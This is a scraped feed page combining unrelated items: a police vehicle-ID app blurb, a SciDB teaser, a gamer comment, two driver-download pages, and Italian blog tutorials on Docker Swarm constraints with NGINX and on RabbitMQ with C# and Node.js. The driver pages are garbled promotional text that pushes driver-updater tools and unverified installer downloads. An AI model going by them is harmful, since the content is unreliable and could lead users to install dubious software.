    Southern California Police Officer Jason Coillot is using his background in helicopter patrol and street patrol experience to develop mobile applications “by officers for officers.” He got his start several years ago when he came up with the concept for a Vehicle Identification System (V.I.S. – The Patrolman's Vehicle Guide), which he then developed into a reference tool app. The V.I.S. provides an extensive image database for viewing or identifying a suspect’s vehicle that can be downloaded and used by individual officers, or licensed for use in patrol cars with the goal of making investigations faster and more efficient.

              Accelerating Scientific Analysis with the SciDB Open Source Database System   

    Science is swimming in data. And, the already daunting task of managing and analyzing this information will only become more difficult as scientific instruments — especially those capable of delivering more than a petabyte (that’s a quadrillion bytes) of information per day — come online.

    Tackling these extreme data challenges will require a system that is easy enough for any scientist to use, that can effectively harness the power of ever-more-powerful supercomputers, and that is unified and extendable. This is where the Department of Energy’s (DOE) National Energy Research Scientific Computing Center’s (NERSC’s) implementation of SciDB comes in.

    Read more

              Comment on Battlefield 4 Operation Blackout 12/25/2013 by emilio g   
    this is just the same old crybaby gamer bullshit. this statement is almost offensive in how it tries to make this some noble political or moral cause. if you really want to help DICE you should open a public, third-party bug database where people can report and vote on issues - THAT would make a difference. and, for the record, i got BF4 to play great on my PC before the last couple patches, and it continues to run great. a lot of the crashes were because of my RAM overclock settings, so it's been rock solid for me after fixing that and getting the client updates.
              Gigabyte Motherboard Ethernet Driver For Windows 7/8 & 10 Download Free   
    If you are looking for Gigabyte Ethernet driver just find the correct driver for your device has never been easier. Their are several driver guide tool which maintains an archive of supported Gigabyte Technology drivers available for free Download for the most popular Gigabyte Technology products and devices. Use our customized search engine to search for Gigabyte Technology drivers or search our entire driver archive to find the exact driver that fits your needs. Just follow the simple download links below and browse our organized Gigabyte Technology product driver database below to find the driver that meets your specifications or scan your PC to update your drivers automatically with one click and be assured that your driver update supports your specific Gigabyte Technology model. You can download latest driver setup of Gigabyte Ethernet driver by managing below download links. After downloading, simply double-click on the exe file to begin installation. You will receive a confirmation that the process has begun, and another upon successful completion- this should take less than a minute on most systems. If you are facing trouble during download, you can contact us via commenting.
    Updating of drivers lets your device up and running faster from even the deepest sleep. This means users will be able to experience almost zero power draw from their PC, but be able to resume Windows® 7 is a few seconds without having the PC go through a full system boot. With Intel® Rapid Start Technology the previous session resumes to the exact as it was, so that applications are still in the same state and no application data is lost. We are sharing free and official site download links so you can manage it easily.
    Download links
    Gigabyte Ethernet Windows 7 (32 Bit)
    Gigabyte Ethernet Windows 7 (64 Bit)
    Gigabyte Ethernet Driver Windows 8/8.1 (32/64 Bit)
    Gigabyte Ethernet Driver Widows 10 (32/64 Bit)

              HP Scanjet 5590 Driver Full Setup Download For Windows XP/7/8/8.1/10    
    You can download latest driver of HP Scanjet 5590 from below download links. The download links are absolutely free and scanned by viruses. If you have already installed latest versions of device drivers installed in your system, just use a special program that will check for driver updates on a daily basis. This will help you avoid errors and system freezes, and will also give your computer a performance boost. We recommend UpdateMyDrivers to all our users. Manually finding drivers for Windows takes forever. And sometimes you still don’t find what you need. Driver Easy changes all that. It scans your computer, tells you what drivers are missing or outdated, then updates them all, in one go. All you have to do is click Update All button, and all drivers will be downloaded and installed automatically. This files which we provides details on the scanners that have driver and/or software support for the Microsoft Windows 8 and Windows 8.1 operating systems. Some older Scanjets have limited, basic feature software support only.
    This is based on customer demand and the continued evolution of technology standards. Use the following information to find out the level of support offered for your scanner and where to obtain it. We are constantly working on growing our driver database. If you have free time and would like to help us, we will really appreciate it. Your contribution will help countless future users of our service. Now just follow the simple download links below to get the latest driver of HP Scanjet printer. We are always sharing free and official site download links so you can mange it easily. The latest setup of driver consist on one RAR file so you will need to download it if your have a reliable internet connection.
    Download links
    HP Scanjet 5590 Driver Download

              Docker Swarm e constraint in un mondo reale   

    Continuo dal post precedente e da questo. Rileggo e cerco di fare autocritica. GRANDI parole avevo usato per descrivere quanto offerto da Docker sia con che senza Swarm. Gli elogi si sprecavano descrivendo con esempi funzionanti quanto fosse possibile. In effetti, come si può non dubitare della bontà di Docker (Swarm) quando ti accorgi che puoi distribuire servizi e altro con semplici comandi da terminale? Come si può non rimanere a bocca aperta(?!), durante le demo, nel vedere come i servizi vengono installati ed eseguiti e come essi, una volta che un host per causa accidentali esce dalla rete, si prenda carico e in piena autonomia riprenda il servizio perso e lo installi su un altro host?

    Tutto questo è bello solo se si vive nel mondo delle demo, il mondo reale è un'altra cosa. Sia nel mondo del cloud che quello reale di una semplice web farm, ci sono macchine predisposte a questo o quel servizio (prestazioni CPU, capacità di memoria, capienza e tipo dei dischi). Nulla da eccepire contro la scalabilità di Docker Swarm, ma se ci sono due macchine che fanno da web server e una delle tue dev'essere messa offline per manutenzione, perché Docker si deve permettere di installare lo stesso servizio sulla macchina dove già gira l'altra istanza del web server? O, peggio, perché dovrebbe installare il web server su una macchina su cui vogliamo che giri un database? - Nelle configurazioni reali delle macchine devo fare in modo che alcune, dove girano servizi delicati, come il database, non siano raggiungibile direttamente dall'esterno e altre restrizioni simili.

    In questo post voglio proprio trattare questi punti e come si può configurare con una migliore personalizzazione Docker Swarm e, perché no, mettere in luce altre problematiche. Ripartiamo dall'inizio: normalmente si hanno necessità di prestazione e permessi tra le varie macchine dipendentemente dal loro utilizzo. Come scritto sopra, una macchina per il database facilmente avrà bisogno di capienti dischi e restrizioni al limite del paranoico per l'accesso dalla rete; la macchina che esporrà servizi web in internet (un reverse proxy come NGINX), non avrà di certo necessità di dischi capienti, e il minimo di permessi per poter poi distribuire i servizi web presenti nelle altre macchine della rete, e così via... Come si ottiene tutto questo con Docker (Swarm)?

    Innanzitutto si possono definire delle label a livello di singola macchina (host). Questo ci permette di filtrare l'assegnazione dei container a macchine predisposte. In questo mio esempio farò in modo di avere più host a cui assegnerò diversi servizi:

    • Nginx
    • Due istante per delle web.api (le stessi viste nei post precedenti)
    • Un ulteriore servizio che sarà utilizzato dalle web api precedenti per simulare una chiamata interna

    Innanzitutto ho scritto una semplice web api che ritorna la data e l'ora attuale nel fuso orario UTC. Il codice è disponibile qui. Il tutto si riduce ad un singolo controller:

    using System; using Microsoft.AspNetCore.Mvc; namespace MVC5ForLinuxTest2.Controllers { [Route("api/[controller]")] public class DatetimeUTCController : Controller { // GET: api/values [HttpGet] public string Get() { return DateTime.UtcNow.ToString("yyyy-MM-dd HH:mm:ss"); } } }

    Richiamandolo direttamente con http://localhost:5001/datetimeutc, la risposta sarà:

    2016-12-10 12:26:29

    Come scritto sopra, questa API simulerà una richiesta interna (non volevo incasinare gli esempi con un database reale), e all'API vista più volte (codice sorgente qui), ho aggiunto un controller SystemInfoUTCController che richiede il DateTime all'API prima vista. Codice per questo controller:

    public class SystemInfoUTCController : Controller { private readonly ISystemInfo _systemInfo; private readonly IHttpHelper _httpHelper; private readonly AppSettings _appSettings; public SystemInfoUTCController(ISystemInfo systemInfo, IHttpHelper httpHelper, IOptions appSettings) { _systemInfo = systemInfo; _httpHelper = httpHelper; _appSettings = appSettings.Value; } [HttpGet] public async Task Get() { DateTime datetimeValue = new DateTime(1970, 1, 1); XElement value = await _httpHelper.GetHttpApi(_appSettings.DateTimeUrl); var content = value.XPathSelectElement("."); if (content != null && !string.IsNullOrEmpty(content.Value)) { datetimeValue = DateTime.Parse(content.Value); } var obj = new DTOSystemInfoUTC(); obj.Guid = _systemInfo.Guid; obj.DateTimeUTC = datetimeValue; return new DTOSystemInfoUTC[] { obj }; } }

    Questa API usa una classe esterna con l'interfaccia IHttpHelper, il cui codice è:

    public class HttpHelper : IHttpHelper { public async Task GetHttpApi(string url) { using (var client = new HttpClient()) { try { client.BaseAddress = new Uri(url); var response = await client.GetAsync(""); response.EnsureSuccessStatusCode(); // Throw in not success var stringResponse = await response.Content.ReadAsStringAsync(); var result = new XElement("Result", stringResponse); return result; } catch (HttpRequestException) { return new XElement("Error"); } } } }

    Ora, richiamando questa API:


    Avremo come risposta:

    [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTimeUTC":"1970-01-01T00:00:00"}] [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTimeUTC":"2016-12-10T12:45:21"}]

    1970-01-01 nel caso la seconda API datetimeutc non fosse attiva, o con la data se è tutto funzionante. Ottimo, ora basta creare come al solito le immagini per Docker (nel codice sorgente c'è il Dockerfile per la loro creazione, o si possono utilizzare quelle pubbliche che ho creato per questi esempi.

    E' arrivato il momento di specificare quali macchine Docker Swarm dovrà utilizzare per i vari servizi. Innanzitutto è necessario creare una rete specifica per Docker Swarm:

    docker network create --driver overlay mynet

    Controllo che sia tutto corretto:

    # docker network ls NETWORK ID NAME DRIVER SCOPE 0f1edcc32683 bridge bridge local 23e41e7b27e5 docker_gwbridge bridge local ff4d514a96e8 host host local d10zid5t65cb ingress overlay swarm 0x9abv9uqtgh mynet overlay swarm 46cd3ea3cb27 none null local

    E arrivato il momento della configurazione degli host. Per questi esempi ho creato quattro macchine virtuali:

    • osboxes1 web=true
    • osboxes2 db=true
    • osboxes3 web=true
    • osboxes4 nginx=true

    15 e 17 saranno per la web api systeiminfo e systeminfoutc, 16 per datetimeutc; la 18 la tratterò a breve. Per specificare quelle label ci sono vari modi in Docker, quello per me più comodo è modificando il file del servizio di Docker. Il file /lib/systemd/system/docker.service:

    [Service] Type=notify # the default is not to use systemd for cgroups because the delegate issues still # exists and systemd currently does not support the cgroup feature set required # for containers run by docker ExecStart=/usr/bin/dockerd -H fd:// ExecReload=/bin/kill -s HUP $MAINPID ...

    E' sufficiente modificare la riga con ExecStart:

    [Service] Type=notify # the default is not to use systemd for cgroups because the delegate issues still # exists and systemd currently does not support the cgroup feature set required # for containers run by docker ExecStart=/usr/bin/dockerd -H fd:// --label web=true ExecReload=/bin/kill -s HUP $MAINPID ...

    Aggiunta la giusta dichiarazione delle label per ogni macchina, e riavviato i servizi di Docker, ora possiamo controllare che tutto funzioni con dei semplici comandi da terminale:

    # docker node ls -f "label=web" ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS 3ta2im9vlfgrbmsyupgdyvljl osboxes3 Ready Active 83f6hk7nraat4ikews3tm9dgm * osboxes1 Ready Active Leader # docker node ls -f "label=db" ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS 897zy6vpbxzrvaif7sfq2rhe0 osboxes2 Ready Active # docker node ls -f "label=nginx" ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS 002iev7q6mgdor0zbo897noay osboxes4 Ready Active

    Perfetto, ho il risultato che volevo. Avendo creato le immagini di Docker, ora posso iniziare la loro installazione sulle macchine che voglio io:

    docker service create --replicas 1 --constraint engine.labels.db==true --name app1 -p 5001:5001 --network mynet sbraer/aspnetcorelinux:api2

    Notare il parametro constraint e replicas. Se tutto è andato a buon fine:

    # docker service ps app1 ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR 0x6nbwrahtd1x7x31exal4sb8 app1.1 sbraer/aspnetcorelinux:api2 osboxes2 Running Starting 7 seconds ago

    Ottimo, il servizio è attivo e funzionante sulla macchina predisposta.

    # docker service ls ID NAME REPLICAS IMAGE COMMAND 7studfb313f7 app1 1/1 sbraer/aspnetcorelinux:api2

    E con questo comando effettivamente vedo che è stata avviata solo una istanza di questa web api (ho usato il parametro --replicas 1). Questo ci riporta però al problema menzionato all'inizio di questo post. Nel caso della web api principale che dev'essere istallata su due macchine, che cosa succede se una delle due viene spenta? Docker Swarm installerò una sua copia sulla macchina disponibile (su nessun'altra che non abbia la stessa definizione della label e di constraint). Proviamo ad installarle:

    docker service create --replicas 2 --constraint engine.labels.web==true --name app0 -p 5000:5000 --network mynet sbraer/aspnetcorelinux:api1

    E se non sapessimo quante macchine abbiamo a disposizione per un servizio?

    docker service create --replicas $(docker node ls -f "label=web" -q | wc -l) --constraint engine.labels.web==true --name app0 -p 5000:5000 --network mynet sbraer/aspnetcorelinux:api1

    Questo facilita un po' le cose ma non risolve il problema principale. Per risolvere definitivamente il problema è sufficiente spulciare tra i parametri di Docker Swarm e trovare --mode global. Questo parametro installerà il container di Docker su tutte le macchine disponibile nella rete di Docker Swarm, ma con la clausola constraint lo farà solo sulle macchine predisposte:

    docker service create --mode global --constraint engine.labels.web==true --name app0 -p 5000:5000 --network mynet sbraer/aspnetcorelinux:api1

    In questo modo, Docker Swarm installerà una sola istanza di container per macchina e avremo anche due utili conseguenze: la prima è che se si spegne una macchina non istallerà doppioni inutili, la seconda, ben più importante e utile, è che, per esigenze di carico o altro, ci sarà sufficiente inserire in rete altre macchine con la label di configurazione che vogliamo, perché Docker Swarm istalli altri container del tutto indipendentemente. Ottima cosa!

    Ecco cosa è accaduto con il comando precedente:

    # docker service ps app0 ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR 9d0a7oms384cbli78a0vuwwre app0.1 sbraer/aspnetcorelinux:api1 osboxes1 Running Starting 36 seconds ago 04y5c35orviamoogaetedjh1i app0.2 sbraer/aspnetcorelinux:api1 osboxes3 Running Starting 35 seconds ago

    Ora ho avviato tutti i servizi principali, controllo che tutto funzioni su tutte le macchine:

    # curl localhost:5000/api/systeminfo [{"guid":"883bc3f9-f636-45f6-a05b-f91a09f95b13","dateTime":"2016-12-10T12:30:33.797293+00:00"}] # curl localhost:5000/api/systeminfoutc [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTimeUTC":"2016-12-10T12:31:08"}]

    Infine due parole sull'accessibilità dei servizi in Docker. Ci sono queste possibili casistiche:

    • Esterno a servizio Docker
    • Docker a servizio esterno
    • Docker a Docker

    Il primo caso è quello usato finora: da un browser o da terminale richiamo un servizio esposto all'interno di un container di Docker; in questo caso è necessario che, quando è avviato, Docker esponga le porte di nostro interesse (5000 nel caso della API principale di questi esempi, 5001 quella per il DateTime UTC) e per richiamarlo è sufficiente usare l'IP di una qualsiasi macchina (se siamo in Docker Swarm e il container è avviato come servizio). Il secondo caso non è preso in considerazione nei miei esempi perché è il più semplice e non comporta alcun problema: se la nostra API avesse avuto bisogno di un database come SQL Server installato su un server esterno, la stringa di connessione sarebbe la classica e non ci sarebbero stati problemi. L'ultimo caso è il più complesso da comprendere all'inizio; le regole sono come quelle del primo caso ma l'utilizzo dell'IP comporterebbe dei problemi perché ogni container vive come se fosse in una macchina a sé; la soluzione più semplice è usare il suo name in modo che, nel caso sia un servizio distribuito via swarm non dovremo preoccuparci di controllare quale e se quella macchina con quel servizio è attiva. Nel file di configurazione della web API systeminfoutc ho definito l'URL della API da richiamare:

    "AppSettings": { "DateTimeUrl": "http://app1:5001/api/DatetimeUTC" }

    Ogni servizio avviato in Docker Swarm sarà visibile agli altri Container in esecuzione; per un controllo più granulare nulla ci vieta di create più reti in Docker con alcuni punti di accesso e condivisioni. In questo caso - lo ammetto - non ho trovato personalmente vantaggi dalle semplici prove fatte. Va be', taglio corto, siamo arrivati al punto che dovremo in qualche modo esporre la web api, e solo lei, su internet. E qui entra in tutto questo la macchina su cui installeremo NGINX. Per chi non lo conoscesse è un web server/reverse proxy molto conosciuto e utilizzato sul web per le sue prestazioni. La sua configurazione è semplice. Nel mio caso, per esporre le due API principali (che rispondono alla porta 5000) userò questo file di configurazione (dotnet.conf):

    worker_processes 1; events { worker_connections 1024; } http { upstream web-app { server app0:5000; } server { listen 80; location / { proxy_pass http://web-app; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection keep-alive; proxy_set_header Host $host; proxy_cache_bypass $http_upgrade; } } }

    Notare le definizione del servizio che risponde alla porta 5000: app0. Questo porta subito a capire che eseguirò NGINX da Docker. Inoltre creerò un container apposito con questo Dockerfile:

    FROM nginx COPY dotnet.conf /etc/nginx/nginx.conf EXPOSE 80

    Creata l'immagine ora potrò avviarla:

    docker service create --mode global --network mynet -p 80:80 --name nginx --constraint engine.labels.nginx==true sbraer/nginx

    Se tutto funziona, ora potrò richiamare l'API con:

    # curl localhost/api/systeminfo [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTime":"2016-12-10T12:37:54.555623+00:00"}] # curl localhost/api/systeminfoutc [{"guid":"883bc3f9-f636-45f6-a05b-f91a09f95b13","dateTimeUTC":"2016-12-10T12:38:01"}]

    Nel mondo reale ora si dovrebbe blindare la rete in modo che non sia accessibile dall'esterno se non per la porta 80 della macchina su cui gira NGINX e rifare la prova:

    # curl [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTime":"2016-12-10T12:39:52.582317+00:00"}]

    Per prova, stoppiamo il servizio interno:

    docker service rm app1

    Nuovo test:

    #curl [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTimeUTC":"1970-01-01T00:00:00"}]

    Come scritto prima per le modalità di accesso ai vari servizi da/a Docker, se avessimo voluto installare NGINX direttamente su una macchina, il file di configurazione avrebbe dovuto puntare direttamente a tutti gli IP che espongono la web API:

    upstream web-app { server; server; }

    In questo caso aggiunte di altre macchine destinate a questo servizio comporterebbe la modifica manuale di questo file, cosa che non accadrebbe nel caso precedente.

    Arrivato a questo punto vediamo alcuni punti importanti: innanzitutto, con la versione attuale di Docker Swarm (1.12 e 1.13) non è possibile distribuire immagini create in locale; è obbligatorio che le immagini sia prese da un hub ufficiale o meno (nei miei esempi ho caricato tutte le immagini di Docker nell'hub ufficiale). Per chi non volesse rendere pubbliche le proprie creazioni (per qualsiasi motivo) è possibile utilizzare hub che permettono il caricamento anche di immagini protette, oppure, più semplice, è possibile crearsi un registry server in casa senza problemi (qui la documentazione). Infine... che dire? Eh lo so, non ho ancora menzionato i problemi... Il problema più fastidioso? Quando si distribuisce su più macchine le istanze di un servizio, non è possibile avere dettagli sull'IP o un modo diretto per raggiungere una determinata istanza di quel servizio. Sembra da poco, ma è un problema grave perché il sistema fin qui descritto funziona alla perfezione su servizi che possono essere scalati indipendentemente l'uno dall'altro ma non per quei servizi che devono essere configurati e collegati. Che cosa voglio dire? Se volessi distribuire, come ho fatto per l'esempio qui sopra, un database su più macchine con Docker Swarm, come mi dovrei comportare se poi le volessi configurare per un cluster con replica?

    Confesso di aver fatto molte prove in merito, ma con la versione attuale di Docker Swarm la soluzione automatica non esiste - o quel database o altro servizio è predisposto o ci sarà poco da fare. Se voglio forzatamente usare Docker Swarm, per ogni macchina in cluster per quel database dovrò creare immagini mirate con file di configurazione differenziato. La cosa funziona, ma dagli applicativi che necessitano l'accesso ci si dovrò accertare di avere stringhe di connessione che permettano la definizione di più server. La soluzione più umana che ho trovato, è usare singole istanze di Docker collegate come visto qui con Consul (ed ecco spiegato il motivo di quel post).

    Ed è finito pure il 2016.


    Continua a leggere Docker Swarm e constraint in un mondo reale.

    (C) 2017 ASPItalia.com Network - All rights reserved

              ASP.NET e RabbitMQ (con un po' di Node.js)   

    Cercherò di essere più breve. Nel post precedente ho fatto una lunga discussione sul mondo dei message broker e dei microservice. Avevo affrontato l'argomento con RabbitMQ, ma tutto quanto avevo scritto era riutilizzabile con qualsiasi altro message broker; i vantaggi di quello scelto da me è che, essendo multipiattaforma, è utilizzabile su qualsiasi sistema operativo o tecnologia. Avevo affrontato varie metodologie di utilizzo partendo con esempi semplici fino a esagerare con il quicksort via message broker. I più semplici esempi si basavano su una console application che, popolando una queue in RabbitMQ, permetteva ad una altra console application di prelevare quel messaggio ed elaborarlo (visualizzazione e poco altro nei miei esempi). Negli esempi un poco più avanzati una console application inviava un messaggio richiedendo un'elaborazione più complessa (un calcolo matematico); questo veniva prelevato ed elaborato da un'altra console application che, questa volta, invece di visualizzare il risultato e terminare l'elaborazione, inviava al message broker la risposta che veniva poi presa dal primo programma per la visualizzazione del risultato. Ecco... ci siamo... questo è il punto cruciale. Alla fine è quello che vogliamo nel 90% delle nostre necessità: un nostro programma, o una nostra pagina di una web application, richiede dei dati che, una volta ricevuti, devono essere visualizzati.

    Se in una console application questo è banale per via degli eventi indipendenti per l'attesa della risposta remota, in una web application come dovremmo comportarci? Prima di arrivare al punto cruciale di questo post, vediamo una divagazione tecnologica che ci introduce all'argomento. Come scritto nel post precedente, avevo iniziato a interessarmi di message broker con Node.js. Questa tecnologia abbastanza recente - 2009 - ha preso velocemente piede anche grazie alle sue prestazioni superiori a quelle che allora andavano per la maggiore (dall'asp.net, al php e così via). Ha una particolarità tutta sua che la differenziava da qualsiasi altra tecnologia presente e usata fino a quel momento, la sua natura asincrona. Mentre il mondo si spostava sul parallelismo sfruttando la potenza delle macchine, ecco che node.js si inventa la ruota e sembra fare un salto all'indietro visto che la sua natura è strettamente single thread. La differenza sta che tutto il codice dev'essere scritto sfruttando chiamate asincrone con tanto di callback - si hanno presente le chiamate ajax? Ecco, node.js spinge quello che siamo abituati lato client anche lato server; quello che facciamo per chiamare il contenuto di una chiamata remota con ajax, lo dobbiamo fare per richiedere i dati a un database, per invocare servizi remoti e così via. E come può, dunque, node.js rispondere a chiamate parallele e avere prestazioni così mirabolanti? Semplicemente perché grazie alla sua natura single thread non deve preoccuparsi di lock e altro multiprocesso; inoltre la sua natura asincrona spinge, anzi, obbliga, a non scrivere codice che rimanga in attesa di una risposta esterna sprecando cicli macchina e risorse. Una nostra pagina web scritta in node.js necessita di una richiesta ad un database per visualizzare una tabella in una pagina; se avvengono due richieste pressoché in parallelo, in single thread di node.js inizia ad elaborare la pagina, effettua la richiesta al database e, senza aspettare la risposta del database, inizia la seconda richiesta che si bloccherà al momento della richiesta al database. Quando il database ritornerà i dati, ecco che node.js continuerà l'elaborazione della prima pagina e poi della seconda. Se poi su macchine multicore possiamo avviare più processi in parallelo di node.js in modo semplicissimo e i processi saranno completamente indipendenti, ci possiamo rendere conto delle prestazioni che si possono raggiungere. Si ricorda dell'esempio del mio post precedente sul modo di richiamare delle tabelle di un database da asp.net?

    var posts = BizEntity.GetPostList(); var tags = BizEntity.GetTagList();

    In node.js potrebbe essere (con il pattern promise che in node.js va per la maggiore):

    var postQuery=queryPosts(); var tagsQuery=queryTags(); Q.all([postQuery, tagsQuery],function(results) {…});

    Ecco, questo dimostra, se si è compreso dalle mie parole come lavora node.js, perché asp.net a confronto spreca, sorry, butta risorse inutilmente - per fortuna con async/await la storia è cambiata. Dopo questo mini corso su node.js per chi ne era completamente digiuno (gli altri sorrideranno per il livello bassissimo scelto) vediamo come è semplice sfruttare con node.js rabbitmq per richiamare un microservice remoto - mi ripeto: che può essere sulla stessa macchina o dalla parte opposta del pianeta, importante è che entrambi siano raggiungibili dallo stesso message broker.

    Prima di tutto scriviamo un microservice in c# (come console application) che, sfruttando RabbitMQ, crea una queue e una exchange che saranno utilizzabili per richiedere una somma tra numeri interi (se non si sa cosa è una queue e una exchange, si riveda il post precedente).

    Ecco il codice:

    using RabbitMQ.Client; using System; using System.Text; using System.Threading; using System.Web.Script.Serialization; namespace MicroserviceAddiction { class Program { const string ExchangeName = "ExchangeIntegerAddition"; const string QueueName = "QueueIntegerAddition"; static void Main(string[] args) { var jsonSerializer = new JavaScriptSerializer(); var connectionFactory = new ConnectionFactory(); connectionFactory.HostName = "localhost"; using (var Connection = connectionFactory.CreateConnection()) { var ModelCentralized = Connection.CreateModel(); ModelCentralized.QueueDeclare(QueueName, false, false, true, null); ModelCentralized.ExchangeDeclare(ExchangeName, ExchangeType.Direct, false, true, null); ModelCentralized.QueueBind(QueueName, ExchangeName, ""); // ModelCentralized.BasicQos(0, 1, false); QueueingBasicConsumer consumer = new QueueingBasicConsumer(ModelCentralized); string consumerTag = ModelCentralized.BasicConsume(QueueName, false, consumer); Console.WriteLine("Wait incoming addition..."); while (true) { var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue(); IBasicProperties props = e.BasicProperties; string replyQueue = props.ReplyTo; string correlationId = props.CorrelationId; string messageId = props.MessageId ?? ""; string content = Encoding.Default.GetString(e.Body); Console.WriteLine("> {0}", content); var calculationObj = jsonSerializer.Deserialize(content); calculationObj.Total = calculationObj.Number1 + calculationObj.Number2; var resultJSON = jsonSerializer.Serialize(calculationObj); #if(DEBUG) Thread.Sleep(5000); #endif Console.WriteLine("< {0}", resultJSON); var msgRaw = Encoding.Default.GetBytes(resultJSON); IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties(); basicProperties.CorrelationId = correlationId; basicProperties.MessageId = messageId; ModelCentralized.BasicPublish("", replyQueue, basicProperties, msgRaw); ModelCentralized.BasicAck(e.DeliveryTag, false); } } } } }

    Se si è letto il post precedente si riconoscerà il codice usato più volte. Si crea una exchange dal nome "ExchangeIntegerAddition" e una queue dove il codice preleverà l'oggetto "AddiotionalServiceClass" in formato JSON e lo deserializzerà in modo che il codice possa gestire questo oggetto in modo nativo:

    public class AdditionServiceClass { public int Number1 { get; set; } public int Number2 { get; set; } public int Total { get; set; } }

    Il tutto si basa su tre righe di codice:

    var calculationObj = jsonSerializer.Deserialize(content); calculationObj.Total = calculationObj.Number1 + calculationObj.Number2; var resultJSON = jsonSerializer.Serialize(calculationObj);

    Presi dall'oggetto inviato dal message broker come la replyQueue (per avere il nome della queue dove inviare la risposta) e i riferimenti del messaggio (MessageId e CorrelationId utilizzati dal processo chiamante per identificare la risposta), si invia la risposta nel modo già affrontato. Fine. Per un argomento che tratteremo a breve, ho inserito, solo per la compilazione in debug, uno sleep di cinque secondi.

    Anche se l'ho già spiegato, ho preferito utilizzare il formato JSON perché questo mi permette l'interoperabilità che mi consente ora di scrivere una web application che, una volta richiesta la pagina, richiamerà questo servizio, e ricevuta la risposta la visualizzerà nel schermo. Innanzitutto si deve preparare il tutto con poche righe di codice. Avendo già sulla propria macchina installato node.js e npm (possibilmente una delle ultime versioni), aprendo il terminale possiamo creare una directory configurare la base della nostra web application con il comando:

    npm init

    Rispondendo alle varie domande avremo sarà creato il file package.json come il seguente:

    { "name": "simpletest1", "version": "0.0.1", "description": "Simple example about comunication from nodejs to rabbitmq", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "AZ", "license": "ISC", "dependencies": { "amqplib": "^0.4.1", "express": "^4.13.4", "node-uuid": "^1.4.7" } }

    "dependencies" inizialmente sarà vuoto, da terminale scriviamo:

    npm install --save express npm install --save amqplib npm install --save node-uuid

    Il comandi npm installerà le dipendenze di cui abbiamo bisogno... Che strano: questa procedura mi ricorda qualcosa... ah sì, la stessa adottata dalla nuova versione di asp.net vnext. Sterile polemica a parte, ora abbiamo tutto quello che ci serve. Scriviamo lo scheletro della nostra web application:

    var express = require('express'); var amqp = require('amqplib/callback_api'); var uuid = require('node-uuid'); var app = express(); // codice per l'attesa di RabbiMQ app.get('/', function (req, res) { // code }); // Handle 404 app.use(function(req, res) { res.status(404).send('404: Page not Found'); }); // Handle 500 app.use(function(error, req, res, next) { res.status(500).send('500: Internal Server Error'); }); var server = app.listen(8001, function () { var host = server.address().address var port = server.address().port console.log("Example app listening at http://%s:%s", host, port) })

    Le prime tre righe caricano le dipendenze necessarie. Express è utilizzato per facilitare l'esposizione e il routing delle nostre pagine, amqplib per l'accesso al message broker RabbitMQ, node-uuid per la creazione di guid univoche. Creata l'istanza all'oggetto app in express, possiamo definire le regole per il routing. Definendo la regola come nel modo seguente:

    app.get('/', function (req, res) { // code // example to show message req.end("Hello World!"); });

    Facciamo in modo che, in causa di richiesta del nostro sito con il path principale, venga eleborata la funzione specificata. Di seguito sono definite le regole di routing in caso di pagina non trovata (errore 404) o di errore nel nostro codice (errore 500). Infine con "server" avviamo effettivamente il server per l'elaborazione delle pagine, nell'esempio qui sopra alla porta 8001. Una volta avviata questa web application con:

    node index.js

    E richiamando da browser la pagina "http://localhost:8001" sarà elaborata la funzione prima definita nel routing - e se è usato l'ultimo codice, sarà visualizzato il messaggio "Hello World!". E' arrivato il momento di inserire il codice per interfacciarsi con RabbitMQ. Vediamo come inviare la richiesta a nostro microservice che esegue il calcolo:

    app.get('/', function (req, res) { var objToRequest = {Number1:1, Number2:2}; var stringToRequest= JSON.stringify(objToRequest); var guid = uuid.v4(); console.log("********* Request: "+stringToRequest+" id: "+guid); ch.publish('ExchangeIntegerAddition', '', new Buffer(stringToRequest), { correlationId: guid, replyTo: q.queue }); cacheRequest[guid]=res; });

    Viene creato un oggetto JSON con i numeri da sommare (si noti che rappresenta la classe AdditionServiceClass in C#). Creato un guid per identificare la chiamata è usato un oggetto "ch" (lo vedremo tra pochissimo come è creato) e con una singola funzione viene inviato il messaggio all'exchange dove il microservice è in attesa, e si aggiungono info sulla queue di reply e l'identificatore della chiamata. Infine è salvato l'oggetto di node.js "res", per inviare la risposta, in un array legato al guid. Ecco la potenza di node.js: grazie alla sua natura asincrona, possiamo salvare gli oggetti della risposta e eseguirli quando vogliamo; nel nostro caso quando sarebbe utile? Semplice, quando il microservice risponde alla richiesta e invia alla nostra queue private predestinata a questo scopo la risposta, possiamo visualizzarla. Ecco il codice:

    var ch, q; var cacheRequest={}; amqp.connect('amqp://localhost', function(err, conn) { if (err) { console.log("********************"); console.log(err); console.log("Errore nella connessione!"); return; } conn.createChannel(function(err, channel) { ch=channel; ch.assertQueue('', {exclusive: true, autoDelete:true}, function(err, queuex) { q=queuex; ch.consume(q.queue, function(msg) { var guid = msg.properties.correlationId; var objResult = JSON.parse(msg.content.toString()); console.log("From RabbitMQ"); var request = cacheRequest[guid]; cacheRequest[guid] = null; request.end( "Result sum (1+2): "+objResult.Total); }, {noAck: true}); }); }); });

    Il codice è facilmente intuibile: aperta una connessione, è creato un channel e una queue private che sarà utilizzata per la ricezione delle riposte (ricordo che una queue private permette la lettura solo dal processo che l'ha creata ma l'inserimento dei messaggi da chiunque). Infine la funzione asincrona "ch.console(...)" attende i messaggi dalla queue. Quando arriva, nel messaggio sarà letto il codice identificativo della chiamata (guid), letta la risposta nel messaggio (essendo in formato JSON diventa tutto più semplice) quindi si riprende dall'array cacheRequest l'oggetto per che ci connette al client, e inviamo definitivamente la risposta. Con poche decine di righe di codice abbiamo tutto quanto di cui abbiamo bisogno: eccezionale.

